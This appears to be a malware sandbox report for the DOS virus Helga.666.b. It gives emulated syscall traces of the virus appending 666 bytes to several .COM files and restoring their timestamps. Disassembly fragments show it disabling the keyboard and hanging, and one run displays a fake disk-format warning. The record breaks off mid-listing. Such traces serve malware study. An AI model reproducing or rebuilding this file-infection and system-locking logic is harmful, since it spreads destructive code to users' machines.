Sample viewer

vx.netlux.org/Virus.DOS.Helga.666.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:39:58.96292626Z 26 PC: 12e56 | Set disk transfer address
2018-12-17T22:39:58.965239431Z 78 PC: 12e69 | Find first file
2018-12-17T22:39:58.971103568Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:58.972516855Z 61 PC: 12ea8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:39:58.979277514Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:58.98692798Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:58.988522385Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:58.991077111Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.007080189Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.021992689Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.041492067Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.043861913Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.051951407Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.061199871Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.062778415Z 61 PC: 12ea8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:39:59.06943179Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.075972733Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:59.078416625Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:59.080764032Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.089078169Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.091499477Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.098256543Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.10004169Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.108498422Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.111413376Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.112851545Z 61 PC: 12ea8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:39:59.121674571Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.128814093Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:59.131139805Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:59.133994954Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.143435972Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.145309864Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.152161507Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.155019189Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.162649859Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.165314409Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.167193618Z 61 PC: 12ea8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:39:59.173797972Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.180313852Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:59.182847405Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:59.186806031Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.199375508Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.202219423Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.220386651Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.222329126Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.24647854Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.250462379Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.251925193Z 61 PC: 12ea8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:39:59.259579969Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.266387662Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:59.268095038Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:59.270791198Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.280119656Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.281771579Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.288874873Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.291874981Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.300564582Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.303606817Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.305976452Z 61 PC: 12ea8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:39:59.313030724Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.320582001Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:59.323102527Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:59.326134464Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.335917885Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.338347485Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.345367429Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.347180542Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.355393146Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.359048796Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.36055505Z 61 PC: 12ea8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:39:59.367709686Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.375291601Z 66 PC: 12edd | Move file pointer
2018-12-17T22:39:59.37741056Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-17T22:39:59.380109192Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:39:59.389772508Z 66 PC: 12eee | Move file pointer
2018-12-17T22:39:59.391227817Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:39:59.397845562Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.400420196Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.408980849Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.412228607Z 47 PC: 12e6f | Get disk transfer address
2018-12-17T22:39:59.414283194Z 61 PC: 12ea8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:39:59.421055705Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:39:59.423919984Z 87 PC: 12f25 | Get or set file date and time
2018-12-17T22:39:59.426594604Z 62 PC: 12f2b | Close file
2018-12-17T22:39:59.433617486Z 79 PC: 12e69 | Find next file
2018-12-17T22:39:59.436197929Z 78 PC: 12fbf | Find first file
2018-12-17T22:39:59.442956165Z 78 PC: 12fbf | Find first file
2018-12-17T22:39:59.45441931Z 78 PC: 12f54 | Find first file
2018-12-17T22:39:59.462014335Z 44 PC: 13077 | Get time 0x13077: cmp ch, cl
0x13079: je 0x1307c
0x1307b: ret
0x1307c: cli
0x1307d: mov al, 0xad
0x1307f: out 0x64, al
0x13081: nop
0x13082: sti
0x13083: mov dx, di
0x13085: add dx, 0x21f
0x13089: mov ah, 9
0x1308b: int 0x21
0x1308d: cli
0x1308e: jmp 0x1308e
0x13090: add word ptr [bx], di
0x13092: aas
0x13093: aas
0x13094: aas
0x13095: aas
0x13096: aas
2018-12-17T22:39:59.46479869Z 26 PC: 12e88 | Set disk transfer address
2018-12-17T22:39:59.465904623Z 9 PC: 12d82 | Display string (String= '��p���� ��� - ��p��殢 ����᫠� Press and -- ')
2018-12-17T22:39:59.566386321Z 49 PC: 12df6 | Terminate and stay resident (Return code = '0' | Memory size = '68')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6890,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:30.89731269Z 26 PC: 12e56 | Set disk transfer address
2018-12-25T12:00:30.899381297Z 78 PC: 12e69 | Find first file
2018-12-25T12:00:30.905209041Z 47 PC: 12e6f | Get disk transfer address
2018-12-25T12:00:30.906299605Z 61 PC: 12ea8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:30.913889917Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:00:30.920845688Z 66 PC: 12edd | Move file pointer
2018-12-25T12:00:30.922516828Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-25T12:00:30.927756557Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:00:30.942010902Z 66 PC: 12eee | Move file pointer
2018-12-25T12:00:30.943647247Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:00:30.951018106Z 87 PC: 12f25 | Get or set file date and time
2018-12-25T12:00:30.953498286Z 62 PC: 12f2b | Close file
2018-12-25T12:00:30.962493657Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:30.965688038Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:30.970042744Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:30.976645982Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:30.983328901Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:30.985429502Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:30.993072425Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:31.001424172Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:31.003192129Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:31.010622984Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.012418488Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.020387596Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.027218279Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:31.028524048Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:31.035057504Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:31.042935714Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:31.044510761Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:31.0469823Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:31.063501544Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:31.065155752Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:31.076308958Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.079733861Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.08764152Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.090502338Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:31.092676378Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:31.103241638Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:31.110222991Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:31.112259055Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:31.114597053Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:31.123097658Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:31.125432807Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:31.133459177Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.134974571Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.14461486Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.148381231Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:31.14940431Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:31.157122934Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:31.16385444Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:31.165674754Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:31.171686213Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:31.180613144Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:31.182441308Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:31.18988785Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.191415374Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.199576346Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.202711383Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:31.203887446Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:31.210658891Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:31.217761278Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:31.2194448Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:31.2220557Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:31.232046288Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:31.234166266Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:31.241276969Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.243434495Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.251062538Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.253487117Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:31.25480209Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:31.262244819Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:31.268412973Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:31.270952033Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:31.273586007Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:31.281890649Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:31.283193099Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:31.290962185Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.292333756Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.300095322Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.304176046Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:31.305099724Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:31.311794071Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:31.315081768Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:31.317136998Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:31.323834599Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:31.326613807Z 78 PC: 12fbf | Find first file
2018-12-25T12:00:31.332475488Z 78 PC: 12fbf | Find first file (See above)
2018-12-25T12:00:31.337957223Z 78 PC: 12f54 | Find first file
2018-12-25T12:00:31.344353225Z 44 PC: 13077 | Get time 0x13077: cmp ch, cl
0x13079: je 0x1307c
0x1307b: ret
0x1307c: cli
0x1307d: mov al, 0xad
0x1307f: out 0x64, al
0x13081: nop
0x13082: sti
0x13083: mov dx, di
0x13085: add dx, 0x21f
0x13089: mov ah, 9
0x1308b: int 0x21
0x1308d: cli
0x1308e: jmp 0x1308e
0x13090: add word ptr [bx], di
0x13092: aas
0x13093: aas
0x13094: aas
0x13095: aas
0x13096: aas
2018-12-25T12:00:31.346419356Z 9 PC: 1308d | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)?y')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":6890,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:32.360569834Z 26 PC: 12e56 | Set disk transfer address
2018-12-25T12:00:32.362464405Z 78 PC: 12e69 | Find first file
2018-12-25T12:00:32.36640078Z 47 PC: 12e6f | Get disk transfer address
2018-12-25T12:00:32.367351909Z 61 PC: 12ea8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:32.372199624Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:00:32.379010124Z 66 PC: 12edd | Move file pointer
2018-12-25T12:00:32.380404901Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-25T12:00:32.383132862Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:00:32.393265964Z 66 PC: 12eee | Move file pointer
2018-12-25T12:00:32.394208138Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:00:32.398384543Z 87 PC: 12f25 | Get or set file date and time
2018-12-25T12:00:32.39992802Z 62 PC: 12f2b | Close file
2018-12-25T12:00:32.407826004Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.410205965Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.411465135Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.41782457Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.423990974Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.425862904Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.428019675Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.437034028Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.439099277Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.445361717Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.447477285Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.455468024Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.45893487Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.460414474Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.468612229Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.475330973Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.477175999Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.480920176Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.489278847Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.490553712Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.497064394Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.498413527Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.505714597Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.508767821Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.509910256Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.516901951Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.523180103Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.525097173Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.527618509Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.535832859Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.537144014Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.543207685Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.544614119Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.552291573Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.554605625Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.555437047Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.562042554Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.567915909Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.569023983Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.572231021Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.579906234Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.58107129Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.588024519Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.589352884Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.596657325Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.599533691Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.60046985Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.606508585Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.613338833Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.614879131Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.617203943Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.626438889Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.627639515Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.63368062Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.6354753Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.642905478Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.646247955Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.648082264Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.654024976Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.660021078Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.661722624Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.663819853Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.671421876Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.672967263Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.679056939Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.680157585Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.687753622Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.690101225Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.690972497Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.697125023Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.699416763Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.700610845Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.707303622Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.710038424Z 78 PC: 12fbf | Find first file
2018-12-25T12:00:32.71513933Z 78 PC: 12fbf | Find first file (See above)
2018-12-25T12:00:32.721036637Z 78 PC: 12f54 | Find first file
2018-12-25T12:00:32.726404947Z 44 PC: 13077 | Get time 0x13077: cmp ch, cl
0x13079: je 0x1307c
0x1307b: ret
0x1307c: cli
0x1307d: mov al, 0xad
0x1307f: out 0x64, al
0x13081: nop
0x13082: sti
0x13083: mov dx, di
0x13085: add dx, 0x21f
0x13089: mov ah, 9
0x1308b: int 0x21
0x1308d: cli
0x1308e: jmp 0x1308e
0x13090: add word ptr [bx], di
0x13092: aas
0x13093: aas
0x13094: aas
0x13095: aas
0x13096: aas
2018-12-25T12:00:32.728131191Z 26 PC: 12e88 | Set disk transfer address
2018-12-25T12:00:32.729569185Z 9 PC: 12d82 | Display string (String= '��p���� ��� - ��p��殢 ����᫠� Press and -- ')
2018-12-25T12:00:32.828039285Z 49 PC: 12df6 | Terminate and stay resident (Return code = '0' | Memory size = '68')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6890,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:32.362383354Z 26 PC: 12e56 | Set disk transfer address
2018-12-25T12:00:32.364536268Z 78 PC: 12e69 | Find first file
2018-12-25T12:00:32.372163165Z 47 PC: 12e6f | Get disk transfer address
2018-12-25T12:00:32.373908551Z 61 PC: 12ea8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:32.381309169Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:00:32.386758781Z 66 PC: 12edd | Move file pointer
2018-12-25T12:00:32.388327956Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
